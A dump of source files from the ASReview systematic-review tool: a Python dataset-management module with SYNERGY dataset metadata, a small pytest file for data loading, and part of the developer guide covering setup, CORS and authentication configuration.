BaseDataGroup(ABC):\n    def __init__(self, *datasets):\n        \"\"\"Group of datasets.\n\n        Group containing one or more datasets.\n\n        Parameters\n        ----------\n        *datasets:\n            One or more datasets.\n        \"\"\"\n        self.datasets = list(datasets)\n\n    @property\n    @abstractmethod\n    def group_id(cls):\n        pass\n\n    @property\n    @abstractmethod\n    def description(cls):\n        pass\n\n    def __str__(self):\n        return f\"<BaseDataGroup group_id='{self.group_id}'>\"\n\n    def __dict__(self):\n        return {d.dataset_id: d for d in self.datasets}\n\n    def append(self, dataset):\n        \"\"\"Append dataset to group.\n\n        dataset: asreview.datasets.BaseDataSet\n            An asreview BaseDataSet-like object.\n        \"\"\"\n        if not isinstance(dataset, BaseDataSet):\n            raise ValueError(\"Expected BaseDataSet or subclass of BaseDataSet.\")\n        self.datasets.append(dataset)\n\n    def find(self, dataset_id):\n        \"\"\"Find dataset in the group.\n\n        Parameters\n        ----------\n        dataset_id: str\n            Identifier of the dataset to look for. It can also be one\n            of the aliases. Case insensitive.\n\n        Returns\n        -------\n        asreview.datasets.BaseDataSet:\n            Returns base dataset with the given dataset_id.\n        \"\"\"\n        results = []\n        for d in self.datasets:\n            if dataset_id.lower() == d.dataset_id.lower() or dataset_id.lower() in [\n                a.lower() for a in d.aliases\n            ]:\n                results.append(d)\n\n        if len(results) > 1:\n            raise ValueError(\n                f\"Broken dataset group '{self.group_id}' containing multiple\"\n                f\" datasets with the same name/alias '{dataset_id}'.\"\n            )\n        elif len(results) == 1:\n            return results[0]\n\n        raise DatasetNotFoundError(f\"Dataset {dataset_id} not found\")\n\n\nclass DatasetManager:\n    @property\n    def groups(self):\n        return list(_entry_points(group=\"asreview.datasets\").names)\n\n    def find(self, dataset_id):\n        \"\"\"Find a dataset.\n\n        Parameters\n        ----------\n        dataset_id: str, iterable\n            Look for this term in aliases within any dataset. A group can\n            be specified by setting dataset_id to 'group_id:dataset_id'.\n            This can be helpful if the dataset_id is not unique.\n            The dataset_id can also be a non-string iterable, in which case\n            a list will be returned with all terms.\n            Dataset_ids should not contain colons (:).\n            A DatasetNotFoundError is raised if the dataset could not\n            be found.\n\n        Returns\n        -------\n        BaseDataSet:\n            Return the dataset with dataset_id.
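\n\n        Examples\n        --------\n        An illustrative lookup; this assumes the 'synergy' dataset group\n        defined in this module is registered as an entry point:\n\n        >>> from asreview.datasets import DatasetManager\n        >>> dataset = DatasetManager().find(\"synergy:van_de_Schoot_2018\")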
\n        \"\"\"\n        # If dataset_id is a non-string iterable, return a list.\n        if is_iterable(dataset_id):\n            return [self.find(x) for x in dataset_id]\n\n        # If dataset_id is a valid path, create a dataset from it.\n        if Path(dataset_id).is_file():\n            return BaseDataSet(dataset_id)\n\n        dataset_id = str(dataset_id)\n\n        # get installed dataset groups\n        dataset_groups = _entry_points(group=\"asreview.datasets\")\n\n        # Split into group/dataset if possible.\n        split_dataset_id = dataset_id.split(\":\")\n        if len(split_dataset_id) == 2:\n            data_group = split_dataset_id[0]\n            split_dataset_id = split_dataset_id[1]\n            if data_group in self.groups:\n                return dataset_groups[data_group].load()().find(split_dataset_id)\n\n        # Look through all available/installed groups for the name.\n        all_results = {}\n        for data_group in dataset_groups:\n            try:\n                all_results[data_group.name] = data_group.load()().find(dataset_id)\n            except Exception:\n                # don't raise error on loading entry point\n                pass\n\n        # If we have multiple results, throw an error.\n        if len(all_results) > 1:\n            raise ValueError(\n                f\"Multiple datasets found: {list(all_results)}.\"\n                \"Use DATAGROUP:DATASET format to specify which one\"\n                \" you want.\"\n            )\n\n        if len(all_results) == 1:\n            return list(all_results.values())[0]\n\n        # Could not find dataset\n        raise DatasetNotFoundError(f\"Dataset {dataset_id} not found\")\n\n    def list(self, include=None, exclude=None, serialize=True, raise_on_error=False):\n        \"\"\"List the available datasets.\n\n        Parameters\n        ----------\n        include: str, iterable\n            List of groups to include.\n        exclude: str, iterable\n            List of groups to exclude from all groups.\n        serialize: bool\n            Make returned list serializable.\n        raise_on_error: bool\n            Raise error when entry point can't be loaded.\n\n        Returns\n        -------\n        list:\n            List with datasets as values.\n        \"\"\"\n\n        if include is not None and exclude is not None:\n            raise ValueError(\"Cannot exclude groups when include is not None.\")\n\n        if include is not None:\n            if not is_iterable(include):\n                include = [include]\n            groups = include\n        elif exclude is not None:\n            exclude = exclude if is_iterable(exclude) else [exclude]\n            groups = list(set(self.groups) - set(exclude))\n        else:\n            groups = self.groups.copy()\n\n        dataset_groups = _entry_points(group=\"asreview.datasets\")\n\n        group_list = []\n        for group in groups:\n            try:\n                group_list.append(dataset_groups[group].load()())\n            except Exception as err:\n                # don't raise error on loading entry point\n                if raise_on_error:\n                    raise err\n\n        if serialize:\n            dataset_list_ser = []\n            for data_group in group_list:\n                try:\n                    group_ser = []\n                    for dataset in data_group.datasets:\n                        group_ser.append(dataset.__dict__())\n                    dataset_list_ser.append(\n                        {\n                            \"group_id\": data_group.group_id,\n                            \"description\": data_group.description,\n                            \"datasets\": group_ser,\n                        }\n                    )\n                except Exception as err:\n                    # don't raise error on loading entry point\n                    if raise_on_error:\n                        raise err\n\n            return dataset_list_ser\n\n        return group_list\n\n\nclass NaturePublicationDataGroup(BaseDataGroup):\n    \"\"\"Datasets used in the paper Van de Schoot et al.
2020.\"\"\"\n\n group_id = \"benchmark-nature\"\n description = (\n \"Datasets used in the validation paper published\"\n \" in Nature Machine Intelligence (van de Schoot et al. 2021)\"\n )\n\n def __init__(self):\n meta_file = \"https://raw.githubusercontent.com/asreview/paper-asreview/master/index_v1.json\" # noqa\n datasets = _download_from_metadata(meta_file)\n\n super(NaturePublicationDataGroup, self).__init__(*datasets)\n\n\nclass SynergyDataSet(BaseDataSet):\n @property\n def filename(self):\n return self.dataset_id + \".csv\"\n\n @property\n def reader(self):\n return CSVReader\n\n def to_file(self, path=None):\n # download, build, and store to local file\n try:\n return sd.Dataset(self.dataset_id).to_frame().to_csv(path)\n except FileNotFoundError:\n tmp_synergy_folder = tempfile.mkdtemp()\n sd.download_raw_subset(self.dataset_id, path=tmp_synergy_folder)\n\n for d in sd.iter_datasets(path=tmp_synergy_folder):\n if d.name == self.dataset_id:\n return d.to_frame().to_csv(path)\n\n raise ValueError(\"Synergy dataset not found\")\n\n\nclass SynergyDataGroup(BaseDataGroup):\n \"\"\"Datasets available in the SYNERGY dataset.\"\"\"\n\n group_id = \"synergy\"\n description = \"SYNERGY datasets (asreview.ai/synergy)\"\n\n def __init__(self):\n # The following code was used to generate the metadata\n #\n # import synergy_dataset as sd\n # from pprint import pprint\n # meta_synergy = {}\n # for x in sd.iter_datasets():\n # meta_synergy[x.name] = {\n # \"title\": x.metadata[\"publication\"][\"display_name\"],\n # \"authors\": x.cite.split(\",\")[0] + \" et al.\",\n # \"topic\": x.metadata\n # [\"data\"][\"concepts\"][\"included\"][0][\"display_name\"],\n # \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n # \"reference\": x.metadata[\"publication\"][\"doi\"],\n # \"license\": \"See Synergy dataset\",\n # \"year\": x.metadata[\"publication\"][\"publication_year\"]\n # }\n # pprint(meta_synergy)\n\n synergy_metadata = {\n \"Appenzeller-Herzog_2019\": {\n \"authors\": \"Appenzeller‐Herzog et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1111/liv.14179\",\n \"title\": \"Comparative effectiveness of common \"\n \"therapies for Wilson disease: A \"\n \"systematic review and meta‐analysis of \"\n \"controlled studies\",\n \"topic\": \"Medicine\",\n \"year\": 2019,\n },\n \"Bos_2018\": {\n \"authors\": \"Bos et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jalz.2018.04.007\",\n \"title\": \"Cerebral small vessel disease and the risk of \"\n \"dementia: A systematic review and meta‐analysis of \"\n \"population‐based evidence\",\n \"topic\": \"Medicine\",\n \"year\": 2018,\n },\n \"Brouwer_2019\": {\n \"authors\": \"Brouwer et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.cpr.2019.101773\",\n \"title\": \"Psychological theories of depressive relapse and \"\n \"recurrence: A systematic review and meta-analysis \"\n \"of prospective studies\",\n \"topic\": \"Psychology\",\n \"year\": 2019,\n },\n \"Chou_2003\": {\n \"authors\": \"Chou et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jpainsymman.2003.03.003\",\n \"title\": \"Comparative efficacy and safety of long-acting oral \"\n \"opioids for chronic non-cancer pain: a systematic \"\n 
\"review\",\n \"topic\": \"Medicine\",\n \"year\": 2003,\n },\n \"Chou_2004\": {\n \"authors\": \"Chou et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jpainsymman.2004.05.002\",\n \"title\": \"Comparative efficacy and safety of skeletal muscle \"\n \"relaxants for spasticity and musculoskeletal \"\n \"conditions: a systematic review\",\n \"topic\": \"Medicine\",\n \"year\": 2004,\n },\n \"Donners_2021\": {\n \"authors\": \"Donners et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1007/s40262-021-01042-w\",\n \"title\": \"Pharmacokinetics and Associated Efficacy of \"\n \"Emicizumab in Humans: A Systematic Review\",\n \"topic\": \"Medicine\",\n \"year\": 2021,\n },\n \"Hall_2012\": {\n \"authors\": \"Hall et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1109/tse.2011.103\",\n \"title\": \"A Systematic Literature Review on Fault Prediction \"\n \"Performance in Software Engineering\",\n \"topic\": \"Computer science\",\n \"year\": 2012,\n },\n \"Jeyaraman_2020\": {\n \"authors\": \"Jeyaraman et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1177/1947603520951623\",\n \"title\": \"Does the Source of Mesenchymal Stem Cell Have an \"\n \"Effect in the Management of Osteoarthritis of \"\n \"the Knee? Meta-Analysis of Randomized Controlled \"\n \"Trials\",\n \"topic\": \"Medicine\",\n \"year\": 2020,\n },\n \"Leenaars_2019\": {\n \"authors\": \"Leenaars et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.5334/jcr.183\",\n \"title\": \"Sleep and Microdialysis: An Experiment and a \"\n \"Systematic Review of Histamine and Several Amino \"\n \"Acids\",\n \"topic\": \"Psychology\",\n \"year\": 2019,\n },\n \"Leenaars_2020\": {\n \"authors\": \"Leenaars et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.3390/ani10061047\",\n \"title\": \"A Systematic Review Comparing Experimental Design \"\n \"of Animal and Human Methotrexate Efficacy Studies \"\n \"for Rheumatoid Arthritis: Lessons for the \"\n \"Translational Value of Animal Studies\",\n \"topic\": \"Medicine\",\n \"year\": 2020,\n },\n \"Meijboom_2021\": {\n \"authors\": \"Meijboom et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1007/s40259-021-00508-4\",\n \"title\": \"Patients Retransitioning from Biosimilar TNFα \"\n \"Inhibitor to the Corresponding Originator After \"\n \"Initial Transitioning to the Biosimilar: A \"\n \"Systematic Review\",\n \"topic\": \"Medicine\",\n \"year\": 2021,\n },\n \"Menon_2022\": {\n \"authors\": \"Menon et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1080/10408444.2022.2082917\",\n \"title\": \"The methodological rigour of systematic reviews in \"\n \"environmental health\",\n \"topic\": \"Medicine\",\n \"year\": 2022,\n },\n \"Moran_2021\": {\n \"authors\": \"Moran et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1111/brv.12655\",\n 
\"title\": \"Poor nutritional condition promotes high‐risk \"\n \"behaviours: a systematic review and meta‐analysis\",\n \"topic\": \"Biology\",\n \"year\": 2021,\n },\n \"Muthu_2021\": {\n \"authors\": \"Muthu et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1097/brs.0000000000003645\",\n \"title\": \"Fragility Analysis of Statistically Significant \"\n \"Outcomes of Randomized Control Trials in Spine \"\n \"Surgery\",\n \"topic\": \"Medicine\",\n \"year\": 2021,\n },\n \"Nelson_2002\": {\n \"authors\": \"Nelson et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1001/jama.288.7.872\",\n \"title\": \"Postmenopausal Hormone Replacement Therapy\",\n \"topic\": \"Medicine\",\n \"year\": 2002,\n },\n \"Oud_2018\": {\n \"authors\": \"Oud et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1177/0004867418791257\",\n \"title\": \"Specialized psychotherapies for adults with borderline \"\n \"personality disorder: A systematic review and \"\n \"meta-analysis\",\n \"topic\": \"Psychology\",\n \"year\": 2018,\n },\n \"Radjenovic_2013\": {\n \"authors\": \"Radjenović et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.infsof.2013.02.009\",\n \"title\": \"Software fault prediction metrics: A systematic \"\n \"literature review\",\n \"topic\": \"Computer science\",\n \"year\": 2013,\n },\n \"Sep_2021\": {\n \"authors\": \"Sep et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1371/journal.pone.0249102\",\n \"title\": \"The rodent object-in-context task: A systematic review \"\n \"and meta-analysis of important variables\",\n \"topic\": \"Psychology\",\n \"year\": 2021,\n },\n \"Smid_2020\": {\n \"authors\": \"Smid et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1080/10705511.2019.1577140\",\n \"title\": \"Bayesian Versus Frequentist Estimation for Structural \"\n \"Equation Models in Small Sample Contexts: A \"\n \"Systematic Review\",\n \"topic\": \"Computer science\",\n \"year\": 2020,\n },\n \"Walker_2018\": {\n \"authors\": \"Walker et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.envint.2017.12.032\",\n \"title\": \"Human and animal evidence of potential \"\n \"transgenerational inheritance of health effects: An \"\n \"evidence map and state-of-the-science evaluation\",\n \"topic\": \"Biology\",\n \"year\": 2018,\n },\n \"Wassenaar_2017\": {\n \"authors\": \"Wassenaar et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1289/ehp1233\",\n \"title\": \"Systematic Review and Meta-Analysis of \"\n \"Early-Life Exposure to Bisphenol A and \"\n \"Obesity-Related Outcomes in Rodents\",\n \"topic\": \"Medicine\",\n \"year\": 2017,\n },\n \"Wolters_2018\": {\n \"authors\": \"Wolters et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jalz.2018.01.007\",\n \"title\": \"Coronary heart disease, heart failure, and the \"\n \"risk 
of dementia: A systematic review and \"\n \"meta‐analysis\",\n \"topic\": \"Medicine\",\n \"year\": 2018,\n },\n \"van_Dis_2020\": {\n \"authors\": \"van Dis et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1001/jamapsychiatry.2019.3986\",\n \"title\": \"Long-term Outcomes of Cognitive Behavioral Therapy \"\n \"for Anxiety-Related Disorders\",\n \"topic\": \"Psychology\",\n \"year\": 2020,\n },\n \"van_de_Schoot_2018\": {\n \"authors\": \"van de Schoot et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1080/00273171.2017.1412293\",\n \"title\": \"Bayesian PTSD-Trajectory Analysis with \"\n \"Informed Priors Based on a Systematic \"\n \"Literature Search and Expert Elicitation\",\n \"topic\": \"Psychology\",\n \"year\": 2018,\n },\n \"van_der_Valk_2021\": {\n \"authors\": \"Valk et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1111/obr.13376\",\n \"title\": \"Cross‐sectional relation of long‐term \"\n \"glucocorticoids in hair with anthropometric \"\n \"measurements and their possible determinants: \"\n \"A systematic review and meta‐analysis\",\n \"topic\": \"Medicine\",\n \"year\": 2021,\n },\n \"van_der_Waal_2022\": {\n \"authors\": \"van der Waal et al.\",\n \"license\": \"See Synergy dataset\",\n \"link\": \"https://doi.org/10.34894/HE6NAQ\",\n \"reference\": \"https://doi.org/10.1016/j.jgo.2022.09.012\",\n \"title\": \"A meta-analysis on the role older adults with \"\n \"cancer favour in treatment decision making\",\n \"topic\": \"Medicine\",\n \"year\": 2022,\n },\n }\n\n datasets = [SynergyDataSet(k, **v) for k, v in synergy_metadata.items()]\n\n super(SynergyDataGroup, self).__init__(*datasets)\n\n\nclass BenchmarkDataGroup(BaseDataGroup):\n \"\"\"Datasets available in the benchmark platform.\n\n Deprecated\n \"\"\"\n\n group_id = \"benchmark\"\n description = \"DEPRECATED: Datasets available in the online benchmark platform\"\n\n def __init__(self):\n meta_file = \"https://raw.githubusercontent.com/asreview/systematic-review-datasets/master/index_v1.json\" # noqa\n datasets = _download_from_metadata(meta_file)\n\n super(BenchmarkDataGroup, self).__init__(*datasets)\n" }, { "alpha_fraction": 0.6651037931442261, "alphanum_fraction": 0.6651037931442261, "avg_line_length": 26.648147583007812, "blob_id": "972345e92802636b8f6266cf9fd47221e933bd82", "content_id": "4bf1d05d51d125ddfd6e4c340e3037d818b971b4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1493, "license_type": "permissive", "max_line_length": 85, "num_lines": 54, "path": "/tests/test_asdata.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\nfrom asreview import ASReviewData\n\n\[email protected](raises=ValueError, reason=\"Bad record_id\")\ndef test_bad_record_id():\n data_fp = Path(\"tests\", \"demo_data\", \"generic_bad_record_id.csv\")\n as_data = ASReviewData.from_file(data_fp)\n assert len(np.unique(as_data.df.index.values)) == len(as_data)\n\n\ndef test_record_id():\n data_fp = Path(\"tests\", \"demo_data\", \"record_id.csv\")\n as_data = ASReviewData.from_file(data_fp)\n\n # test is labels are numpy array\n assert 
isinstance(as_data.labels, np.ndarray)\n\n # test is index name is record_id\n assert as_data.df.index.name == \"record_id\"\n\n\ndef test_column_names_with_spaces():\n data_fp = Path(\"tests\", \"demo_data\", \"generic.csv\")\n as_data = ASReviewData.from_file(data_fp)\n\n data_fp_bad_cols = Path(\n \"tests\", \"demo_data\", \"generic_column_names_with_spaces.csv\"\n )\n as_data_bad_cols = ASReviewData.from_file(data_fp_bad_cols)\n\n assert_frame_equal(\n as_data.df[[\"title\", \"abstract\"]], as_data_bad_cols.df[[\"title\", \"abstract\"]]\n )\n\n\ndef test_asdata_init():\n data_fp = Path(\"tests\", \"demo_data\", \"generic.csv\")\n\n # data via pandas\n df = pd.read_csv(data_fp)\n df.index.name = \"record_id\"\n as_data_init = ASReviewData(df)\n\n # data via classmethod\n as_data = ASReviewData.from_file(data_fp)\n\n assert_frame_equal(as_data_init.df, as_data.df)\n" }, { "alpha_fraction": 0.7519187331199646, "alphanum_fraction": 0.7615557909011841, "avg_line_length": 49.08381652832031, "blob_id": "9dfa7b27a925fe69142ca8638a19555f2c2f829a", "content_id": "b0dea47ab6a5982f3cddaeae0bbd8521dd926e55", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17337, "license_type": "permissive", "max_line_length": 610, "num_lines": 346, "path": "/DEVELOPMENT.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# DEVELOPMENT\n\n## Build project\n\nBuild the project from source with the following code.\n\n\tpython setup.py compile_assets\n\tpython setup.py sdist bdist_wheel\n\n## Development workflow\n\n### Git Submodules\nSome demo datasets are included as a submodule. Directory [asreview/tests/citation-file-formatting](https://github.com/ottomattas/asreview/tree/development-v1/tests) is cloned from [citation-file-formatting](https://github.com/asreview/citation-file-formatting).\n\nExamples:\n- To clone the full repository with submodules in one line, add `--recursive` flag:\n\n\t```git clone --recursive git://github.com/asreview/asreview.git```\n\n- To update the submodule, you would still need to follow the contribution guide in the submodule repository. And then create a PR for the main repository with the updated submodule commit.\n\n### Back end\n\nInstall Python\n\nInstall the ASReview package\n\n\tpip install -e .[dev]\n\nStart the Python API server with the Flask development environment\n\n\texport FLASK_DEBUG=1\n\tasreview lab\n\nFor Windows, use\n\n\tset FLASK_DEBUG=1\n\tasreview lab\n\n#### Formatting and linting\n\nUse `flake8` to lint the Python code and format the code with `black`. Use\n`black[jupyter]` if you are editing the Jupyter notebooks. Use `isort` to\nsort the imports.\n\nInstall the linters and formatters with:\n\n```sh\npip install black[jupyter] flake8 flake8-isort isort\n```\n\nRun the following commands to lint and format:\n\n```sh\nblack .\nisort .\nflake8 .\n```\n\n### Front end\n\nInstall both [npm][1] and Python\n\nStart the Python API server with the Flask development environment. Before the front end development can be started, the back end has to run as well\n\n\texport FLASK_DEBUG=1\n\tasreview lab\n\nFor Windows, use\n\n\tset FLASK_DEBUG=1\n\tasreview lab\n\nNavigate to `asreview/webapp` and install the front end application with npm\n\n\tcd asreview/webapp\n\tnpm install\n\nThe user interface is written in [React][2]. Start the local front end application with npm\n\n\tnpm start\n\nOpen the web browser at `localhost:3000`\n\n**Important**: Ignore `localhost:5000`. 
You can also find a front end on `:5000` but this is not relevant for the current front end development step.\n\n[1]:\thttps://www.npmjs.com/get-npm\n[2]:\thttps://reactjs.org/\n\n### Front end development and connection/CORS issues\n\nIn development, when working on the front end, the front- and backend are strictly separated. It is assumed the Flask backend runs on port 5000 and the React front end on port 3000. Deviating from these ports will lead to connection or CORS (Cross-Origin Resource Sharing) issues.\n\nAs for CORS issues: it is necessary to precisely define the \"allowed origins\" in the backend. These origins must reflect the URL(s) used by the front end to call the backend. If correctly configured, they are added to the headers of the backend response, so they can be verified by your browser. If the list with origin-URLs doesn't provide a URL that corresponds with the URL used in the original request of the front end, your request will fail. __Setting the allowed origins can be done in the [config file](#full-configuration)__.\n\nYou can solve connection/CORS issues by doing the following:\n1. Start the backend and verify what port number it's running on (read the first lines of the output once you've started the backend in the terminal).\n2. Make sure the front end knows where it can find the backend. React reads a configuration `.env` file in the `/asreview/webapp` folder which tells it to use `http://localhost:5000/`. Override this config file by either adding a local version (e.g. `/asreview/webapp/.env.local`) in which you put the correct backend URL (do not forget the `REACT_APP_API_URL` variable, see the `.env` file) or change the URL in the `.env` file itself.\n3. If you are running the front end separately from the backend you need to adjust the CORS's 'allowed origins' parameter in the backend to avoid problems. You can do this by setting the front end URL(s) in the [optional parameters of the config file](#optional-config-parameters) under the \"ALLOWED_ORIGINS\" key.\n\nBe precise when it comes to URLs/port numbers! In the context of CORS `localhost` is different from `127.0.0.1`, although they normally refer to the same host.\n\n❗Mac users beware: depending on your version of macOS you may experience trouble with `localhost:5000`. Port 5000 may be in use by \"Airplay Receiver\" which may (!) cause nondeterministic behavior. If you experience similar issues [switch to a different port](#optional-config-parameters).\n\n#### Formatting and linting\n\nPlease make use of Prettier (https://prettier.io/docs/en/install.html) to\nformat React/Javascript code. Use the following code to format all files in\nthe webapp folder.\n\n```\ncd asreview/webapp\nnpx prettier --write .\n```\n\n## Authentication\n\nIt is possible to run ASReview with authentication, enabling multiple users to run their\nprojects in their own separate workspaces. Authentication requires storing user\naccounts and linking these accounts to projects. Currently we are using a small SQLite \ndatabase (asreview.development.sqlite or asreview.production.sqlite) in the ASReview \nfolder to store that information.\n\n### Bare bones authentication\n\nUsing authentication requires more configuration.
Let's start with running a bare bones\nauthenticated version of the application from the CLI:\n```\n$ python3 -m asreview lab --enable-auth --secret-key=<secret key> --salt=<salt>\n```\nwhere `--enable-auth` forces the application to run in an authenticated mode, \n`<secret key>` is a string that is used for encrypting cookies and `<salt>` is\na string that is used to hash passwords.\n\nThis bare bones application only allows an administrator to create user accounts by \nediting the database without the use of the ASReview application! To facilitate this,\none could use the User model that can be found in `/asreview/webapp/authentication/models.py`. Note that with this simple configuration it is not possible for a user to change forgotten passwords without the assistance of the administrator.\n\n### Full configuration\n\nTo configure the authentication in more detail we need to create a TOML file that contains all authentication parameters. The parameters in that TOML file will override parameters that were passed in the CLI. Here's an example:\n```toml\nDEBUG = true\nAUTHENTICATION_ENABLED = true\nSECRET_KEY = \"<secret key>\"\nSECURITY_PASSWORD_SALT = \"<salt>\"\nSESSION_COOKIE_SECURE = true\nREMEMBER_COOKIE_SECURE = true\nSESSION_COOKIE_SAMESITE = \"Lax\"\nSQLALCHEMY_TRACK_MODIFICATIONS = true\nALLOW_ACCOUNT_CREATION = true\nALLOW_TEAMS = false\nEMAIL_VERIFICATION = false\n\n[EMAIL_CONFIG]\nSERVER = \"<smtp-server>\"\nPORT = 465\nUSERNAME = \"<smtp-server-username>\"\nPASSWORD = \"<smtp-server-password>\"\nUSE_TLS = false\nUSE_SSL = true\nREPLY_ADDRESS = \"<preferred reply email address>\"\n\n[OAUTH]\n [OAUTH.GitHub]\n AUTHORIZATION_URL = \"https://github.com/login/oauth/authorize\"\n TOKEN_URL = \"https://github.com/login/oauth/access_token\"\n CLIENT_ID = \"<GitHub client ID>\"\n CLIENT_SECRET = \"<GitHub client secret>\"\n SCOPE = \"\"\n \n [OAUTH.Orcid]\n AUTHORIZATION_URL = \"https://sandbox.orcid.org/oauth/authorize\"\n TOKEN_URL = \"https://sandbox.orcid.org/oauth/token\"\n CLIENT_ID = \"<Orcid client ID>\"\n CLIENT_SECRET = \"<Orcid client secret>\"\n SCOPE = \"/authenticate\"\n\n [OAUTH.Google]\n AUTHORIZATION_URL = \"https://accounts.google.com/o/oauth2/auth\"\n TOKEN_URL = \"https://oauth2.googleapis.com/token\"\n CLIENT_ID = \"<Google client ID>\"\n CLIENT_SECRET = \"<Google client secret>\"\n SCOPE = \"profile email\"\n```\nStore the TOML file on the server and start the ASReview application from the CLI with the\n`--flask-configfile` parameter:\n```\n$ python3 -m asreview lab --flask-configfile=<path-to-TOML-config-file>\n```\nA number of the keys in the TOML file are standard Flask parameters. The keys that are specific for authenticating ASReview are summarised below:\n* AUTHENTICATION_ENABLED: if set to `true` the application will start with authentication enabled. If the SQLite database does not exist, one will be created during startup.\n* SECRET_KEY: the secret key is a string that is used to encrypt cookies and is mandatory if authentication is required.\n* SECURITY_PASSWORD_SALT: another string used to hash passwords, also mandatory if authentication is required.\n* ALLOW_ACCOUNT_CREATION: enables account creation by users, either by front- or backend.\n* EMAIL_VERIFICATION: used in conjunction with ALLOW_ACCOUNT_CREATION. If set to `true` the system sends a verification email after account creation. Only relevant if the account is __not__ created by OAuth. 
This parameter can be omitted if you don't want verification.\n* EMAIL_CONFIG: configuration of the SMTP email server that is used for email verification. It also allows users to retrieve a new password after forgetting it. Don't forget to enter the reply address (REPLY_ADDRESS) of your system emails. Omit this parameter if system emails for verification and password retrieval are unwanted.\n* OAUTH: an authenticated ASReview application may integrate with the OAuth functionality of Github, Orcid and Google. Provide the necessary OAuth login credentials (for [Github](https://docs.github.com/en/apps/oauth-apps/building-oauth-apps/creating-an-oauth-app), [Orcid](https://info.orcid.org/documentation/api-tutorials/api-tutorial-get-and-authenticated-orcid-id/) and [Google](https://support.google.com/cloud/answer/6158849?hl=en)). Please note that the AUTHORIZATION_URL and TOKEN_URL of the Orcid entry are sandbox URLs, and thus not to be used in production. Omit this parameter if OAuth is unwanted.\n\n#### Optional config parameters\n\nThere are three optional parameters available that control what address the ASReview server listens to, and avoid CORS issues:\n\n```toml\nHOST = \"0.0.0.0\"\nPORT = 5001\nALLOWED_ORIGINS = [\"http://localhost:3000\"]\n```\nThe HOST and PORT determine what address the ASReview server listens to. If this deviates from `localhost` and port 5000, and you run the front end separately, make sure the [front end can find the backend](#front-end-development-and-connectioncors-issues). The ALLOWED_ORIGINS key must be set if you run the front end separately. List all URLs that your front end uses. This can be more than one URL. Failing to do so will certainly lead to CORS issues.\n\n### Converting an unauthenticated application into an authenticated one\n\nStart the application with authentication enabled for the first time. This ensures the creation of the necessary database. To avoid unwanted user input, shut down the application.\n\nTo convert the old unauthenticated projects into authenticated ones, the following steps should be taken:\n\n1. Create user accounts for people to sign in.\n2. Convert project data and link the projects to the owner's user account.\n\nAmong the CLI subcommands of the ASReview application is a tool that facilitates these procedures:\n\n```\n$ asreview auth-tool --help\n```\n\n#### Creating user accounts\n\nThe first step is to create user accounts. This can be done 